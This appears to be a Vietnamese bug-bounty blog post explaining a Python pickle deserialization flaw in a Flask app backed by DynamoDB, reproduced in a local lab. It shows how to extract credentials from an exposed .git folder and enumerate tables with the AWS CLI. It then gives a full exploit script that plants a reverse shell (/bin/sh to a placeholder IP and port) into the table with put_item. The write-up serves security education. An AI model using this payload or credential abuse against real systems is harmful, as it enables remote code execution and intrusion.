<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Python Deserialization on Integrated AWS DDB Flask App - iam.chi</title>
<meta name="description" content="Cách đây vài hôm mình có gặp một challenge hay ho khi làm Bug Bounty ở nền Cloud &amp;&amp; Web. Tuy flow xử lý data không có gì là mới, nhưng việc application sử dụng AWS DynamoDB để lưu trữ serialized data làm bug này trở nên thú vị hơn nhiều.">


  <meta name="author" content="Chi Tran">
  
  <meta property="article:author" content="Chi Tran">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="iam.chi">
<meta property="og:title" content="Python Deserialization on Integrated AWS DDB Flask App">
<meta property="og:url" content="http://localhost:4000/bug-hunting/2021/12/19/python-deserialization-on-integrated-aws-ddb-flask-app.html">


  <meta property="og:description" content="Cách đây vài hôm mình có gặp một challenge hay ho khi làm Bug Bounty ở nền Cloud &amp;&amp; Web. Tuy flow xử lý data không có gì là mới, nhưng việc application sử dụng AWS DynamoDB để lưu trữ serialized data làm bug này trở nên thú vị hơn nhiều.">







  <meta property="article:published_time" content="2021-12-19T00:00:00-06:00">






<link rel="canonical" href="http://localhost:4000/bug-hunting/2021/12/19/python-deserialization-on-integrated-aws-ddb-flask-app.html">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": null,
      "url": "http://localhost:4000/"
    
  }
</script>







<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="iam.chi Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          iam.chi
          
        </a>
        <ul class="visible-links"></ul>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      



<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      
        <img src="/images/bio-photo.jpg" alt="Chi Tran" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">Chi Tran</h3>
    
    
      <div class="author__bio" itemprop="description">
        <p>Hey! I am Chi | Father of 2 | Security Engineer | I love cooking and spicy noodles.</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      

      
        
          
            <li><a href="mailto:research@ctrsec.io" rel="nofollow noopener noreferrer"><i class="fas fa-fw fa-envelope-square" aria-hidden="true"></i><span class="label">Email</span></a></li>
          
        
          
            <li><a href="https://www.linkedin.com/in/remote-code-execution/" rel="nofollow noopener noreferrer"><i class="fas fa-fw fa-link" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/imspciynoodles" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Python Deserialization on Integrated AWS DDB Flask App">
    <meta itemprop="description" content="Cách đây vài hôm mình có gặp một challenge hay ho khi làm Bug Bounty ở nền Cloud &amp;&amp; Web. Tuy flow xử lý data không có gì là mới, nhưng việc application sử dụng AWS DynamoDB để lưu trữ serialized data làm bug này trở nên thú vị hơn nhiều.">
    <meta itemprop="datePublished" content="2021-12-19T00:00:00-06:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">Python Deserialization on Integrated AWS DDB Flask App
</h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <p>Cách đây vài hôm mình có gặp một challenge hay ho khi làm Bug Bounty ở nền Cloud &amp;&amp; Web. Tuy flow xử lý data không có gì là mới, nhưng việc application sử dụng AWS DynamoDB để lưu trữ serialized data làm bug này trở nên thú vị hơn nhiều.</p>

<h4 id="tiếp-cận">Tiếp cận</h4>

<ul>
  <li>Như thường lệ, một trong những việc mà đa số ai cũng làm khi tiếp cận 1 website đó là kiểm tra sự tồn tại của folder /.git.</li>
  <li>Với trường hợp mình gặp cũng không ngoại lệ. .git được tải xuống và extract ra được file app.py với nội dung tương tự như sau (nội dung đã được mình chỉnh sửa để dựng lại lab thay vì sử dụng mã nguồn gốc)</li>
</ul>

<p><img src="images/1*qUyMaO6pXSSxF6WlJd8r8g.png" alt="" /></p>

<ul>
  <li>Mình note nhanh là mấy bạn đừng có cố gắng soi cái Access Key với Secret Key làm gì vì mình dựng lại bug này trên Dynamo Local. Nó không xài được trên AWS Console như 1 IAM Cred thiệt đâu.</li>
  <li>Đồng thời giao diện web như sau (mình cũng mode lại 1 Flask app khác để khác với submission thực tế, tuy nhiên đều cùng concept)</li>
</ul>

<p><img src="images/1*ZrQBfd8GSwjZlFGH55Tb1A.png" alt="" /></p>

<p>Main Page</p>

<p><img src="images/1*dYHSD56WrNidmXgy4ajOlQ.png" alt="" /></p>

<p>Sub-endpoint</p>

<p><img src="images/1*wN4mOwiTegX80bY_UJ6wxw.png" alt="" /></p>

<p>Customers endoint</p>

<ul>
  <li>Điểm lưu ý đầu tiên, nội dung của customers.html này có đoạn như sau</li>
</ul>

<p><img src="images/1*bp2H3th35eUHnmfH09wMxg.png" alt="" /></p>

<p>Name và Description được lấy từ 1 JSON object pass từ main controller (app.py)</p>

<ul>
  <li>Quay lại app.py, object data này được tạo ra như sau</li>
</ul>

<p><img src="images/1*VJwcZvcbDweTgONPJ-GYPA.png" alt="" /></p>

<ul>
  <li>Workflow có thể hiểu như sau: Khi page được loaded, JSON object được parsed từ array data (app.py). Data này được hình thành bằng việc Scan Items từ DynamoDB table, item sau đó được decode và pickle load, cuối cùng lưu vào array.</li>
  <li>Điểm đáng chú ý thứ 2 là việc sử dụng Pickle để load data từ DynamoDB. Dẫn đến một hướng khai thác khả thi nhất để có thể RCE được đó là thay vì deserialize một item bình thường, bằng cách nào đó application sẽ deserialize payload reverse shell.</li>
  <li>Đối với giải pháp như vậy, việc đầu tiên cần làm đó là compromise được DynamoDB table, sau đó ghi vào trường data một payload RCE bằng API put_item() từ AWS CLI. Example:</li>
</ul>

<blockquote>
  <p>client.put_item( TableName = TABLE_NAME, Item={ ‘data’: {‘S’: data}, ‘Id’:{‘N’:1}} )</p>
</blockquote>

<ul>
  <li>Với việc AWS Credential bị exposed trong app.py, bước tiếp theo là xác định cấu trúc table. Một lưu ý đối với DynamoDB table là case-sensitive, có nghĩa là mọi item được ghi bằng code hay bằng AWS CLI đều phải chính xác từ chữ hoa đến chữ thường.</li>
</ul>

<h4 id="exploit">Exploit</h4>

<ul>
  <li><strong>Bước 1</strong>: Kiểm tra AWS creds có quyền đến những table nào</li>
</ul>

<blockquote>
  <p>aws dynamodb list-tables — endpoint-url <a href="http://localhost:8000">http://localhost:8000</a></p>
</blockquote>

<p><img src="images/1*en5Ydy2eEcb2yHYBqSs1IQ.png" alt="" /></p>

<ul>
  <li><strong>Bước 2</strong>: Xác định cấu trúc Table customers</li>
</ul>

<blockquote>
  <p>aws dynamodb scan — table-name customers — endpoint-url <a href="http://localhost:8000">http://localhost:8000</a></p>
</blockquote>

<p><img src="images/1*qEqqnWR782oJf6v1MTnmsw.png" alt="" /></p>

<ul>
  <li>Table được cấu thành bởi trường <strong>Id</strong> (<strong>Number</strong>) là <strong>Partition Key</strong>, và <strong>data</strong> (<strong>String</strong>) là serialized data.</li>
  <li><strong>Bước 3</strong>: Exploit</li>
</ul>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">boto3</span> <span class="kn">import</span> <span class="nn">pickle</span> <span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">base64</span>

<span class="k">class</span> <span class="nc">RCE</span><span class="p">:</span> <span class="k">def</span> <span class="err">\</span><span class="nf">_</span>\<span class="n">_reduce</span>\<span class="n">_</span>\<span class="n">_</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="n">command</span> <span class="o">=</span> <span class="err">“””</span> <span class="n">python3</span> <span class="o">-</span><span class="n">c</span> <span class="err">‘</span><span class="kn">import</span> <span class="nn">socket</span><span class="p">,</span><span class="n">subprocess</span><span class="p">,</span><span class="n">os</span><span class="p">;</span><span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF</span>\<span class="n">_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK</span>\<span class="n">_STREAM</span><span class="p">);</span><span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="err">“</span><span class="o">**&lt;</span><span class="n">IP</span><span class="o">&gt;**</span><span class="err">”</span><span class="p">,</span><span class="o">**&lt;</span><span class="n">port</span><span class="o">&gt;**</span><span class="p">));</span><span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">);</span> <span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">);</span> <span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">);</span><span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">call</span><span class="p">(</span>\<span class="p">[</span><span class="err">“</span><span class="o">**/</span><span class="nb">bin</span><span class="o">/</span><span class="n">sh</span><span class="o">**</span><span class="err">”</span><span class="p">,</span><span class="err">”</span><span class="o">-</span><span class="n">i</span><span class="err">”</span>\<span class="p">]);</span><span class="err">’</span> <span class="err">“””</span> <span class="k">return</span> <span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="n">command</span><span class="p">,))</span>

<span class="k">if</span> \<span class="n">_</span>\<span class="n">_name</span>\<span class="n">_</span>\<span class="n">_</span> <span class="o">==</span> <span class="err">‘</span>\<span class="n">_</span>\<span class="n">_main</span>\<span class="n">_</span>\<span class="n">_</span><span class="err">’</span><span class="p">:</span> <span class="n">pickled</span> <span class="o">=</span> <span class="n">pickle</span><span class="p">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">RCE</span><span class="p">())</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">urlsafe</span>\<span class="n">_b64encode</span><span class="p">(</span><span class="n">sample1</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="err">“</span><span class="n">utf</span><span class="o">-</span><span class="mi">8</span><span class="err">”</span><span class="p">)</span> <span class="k">print</span> <span class="p">(</span><span class="err">“</span><span class="n">Payload</span> <span class="p">:</span><span class="err">”</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">client</span> <span class="o">=</span> <span class="n">boto3</span><span class="p">.</span><span class="n">client</span><span class="p">(</span> <span class="err">‘</span><span class="n">dynamodb</span><span class="err">’</span><span class="p">,</span> <span class="n">aws</span>\<span class="n">_access</span>\<span class="n">_key</span>\<span class="n">_id</span><span class="o">=</span><span class="err">”</span><span class="n">access</span>\<span class="n">_key</span><span class="err">”</span><span class="p">,</span> <span class="n">aws</span>\<span class="n">_secret</span>\<span class="n">_access</span>\<span class="n">_key</span><span class="o">=</span><span class="err">”</span><span class="n">secret</span>\<span class="n">_key</span><span class="err">”</span><span class="p">,</span> <span class="n">region</span>\<span class="n">_name</span><span class="o">=</span><span class="err">”</span><span class="n">us</span><span class="o">-</span><span class="n">east</span><span class="o">-</span><span class="mi">1</span><span class="s">", endpoint\_url=’[http://127.0.0.1:8000'](http://127.0.0.1:8000%27) )

client.put\_item( TableName=TABLE\_NAME, Item={ ‘data’: {‘S’:payload}, ‘Id’:{‘N’:1}} )</span></code></pre></figure>

<ul>
  <li>Cuối cùng là reload lại endpoint để trigger insecure deserialization</li>
</ul>

<p><img src="images/1*jTfiSNvhuK9h7SKZ6OodLg.png" alt="" /></p>

<p><strong>Good luck have fun!</strong></p>

        
      </section>

      <footer class="page__meta">
        
        


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2021-12-19T00:00:00-06:00">December 19, 2021</time></p>


      </footer>

      <section class="page__share">
  

  <a href="https://twitter.com/intent/tweet?text=Python+Deserialization+on+Integrated+AWS+DDB+Flask+App%20http%3A%2F%2Flocalhost%3A4000%2Fbug-hunting%2F2021%2F12%2F19%2Fpython-deserialization-on-integrated-aws-ddb-flask-app.html" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2Fbug-hunting%2F2021%2F12%2F19%2Fpython-deserialization-on-integrated-aws-ddb-flask-app.html" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Flocalhost%3A4000%2Fbug-hunting%2F2021%2F12%2F19%2Fpython-deserialization-on-integrated-aws-ddb-flask-app.html" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/research/2021/09/29/weak-key-cryptography-in-real-world-english.html" class="pagination--pager" title="[English] How I faked tons of COVID passes — “Weak Key Cryptography in real world”
">Previous</a>
    
    
      <a href="/research/2022/01/21/pwning-facebook-portal.html" class="pagination--pager" title="Pwning the Facebook Portal
">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
    <div class="page__related">
      <h4 class="page__related-title">You May Also Enjoy</h4>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/jekyll/update/2023/01/26/welcome-to-jekyll.html" rel="permalink">Welcome to Jekyll!
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different wa...</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/research/2022/01/28/pwning-the-samsung-tv.html" rel="permalink">Pwning the Samsung TV
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Overview

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/research/2022/01/21/pwning-facebook-portal.html" rel="permalink">Pwning the Facebook Portal
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Overview

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/research/2021/09/29/weak-key-cryptography-in-real-world-english.html" rel="permalink">[English] How I faked tons of COVID passes — “Weak Key Cryptography in real world”
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I. SUMMARY

</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    

    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2023 iam.chi.</div>


      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>










  </body>
</html>
